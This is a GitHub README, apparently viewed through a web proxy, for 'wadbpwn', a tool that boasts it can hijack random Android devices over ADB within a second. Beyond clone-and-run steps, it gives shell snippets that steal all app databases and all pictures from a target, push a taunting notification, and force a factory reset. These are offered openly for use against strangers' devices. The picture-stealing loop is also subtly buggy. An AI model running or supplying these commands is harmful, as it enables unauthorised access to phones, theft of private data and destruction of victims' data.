8000 GitHub - wuseman/wadbpwn: Hack random android devices with 100% guarantee to succeed within 1 second.
[go: up one dir, main page]
More Web Proxy on the site http://driver.im/
Skip to content

wuseman/wadbpwn

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 
 
 

Repository files navigation

wadbpwn

It's true - We can takeover a device within seconds and get a proxy or steal anything or whatever!

Hack random android device with 100% guarantee to succeed within 1 second.

Get Started On Linux/MacOSX

git clone https://github.com/wuseman/wadbpwn
cd wadbpwn
chmod +x wadb*
bash ./wadbpwn.sh
  • Wait ~1 second

Target has been pwned!

  • Enjoy ;-)

Get Started On Windows 10

Install any linux distro from microsoft store and run commands above..

Tips & Tricks made by wuseman

Steal all databases from the device ( require root )

which su &> /dev/null
if [[ $? -eq "0" ]]; then
   adb pull /data/data/ /some/path
else
   printf "* No root detected, just try another target..\n"
   exit 1
fi

Steal all pictures:

A simple example:

PICS="$(adb shell 'su -c find / \( -name '*.png' -name '*.jpg*' \)')"
for pictures in $PICS; do
   adb pull -p $PICS /some/folder
 done
printf "Done..is it your lucky day? ;-)\n"

Send a push notice:

adb shell am broadcast -a com.google.android.c2dm.intent.RECEIVE -n <your.app.package>/com.google.android.gms.gcm.GcmReceiver --es "You h4v3 b33n h3cked mat3" "hrhr!"

Factory reset of the device:

adb shell am broadcast -a android.intent.action.MASTER_CLEAR
adb shell reboot 

License

This project is licensed under the GNU General Public License v3.0 - see the LICENSE.md file for details

About

Hack random android devices with 100% guarantee to succeed within 1 second.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

0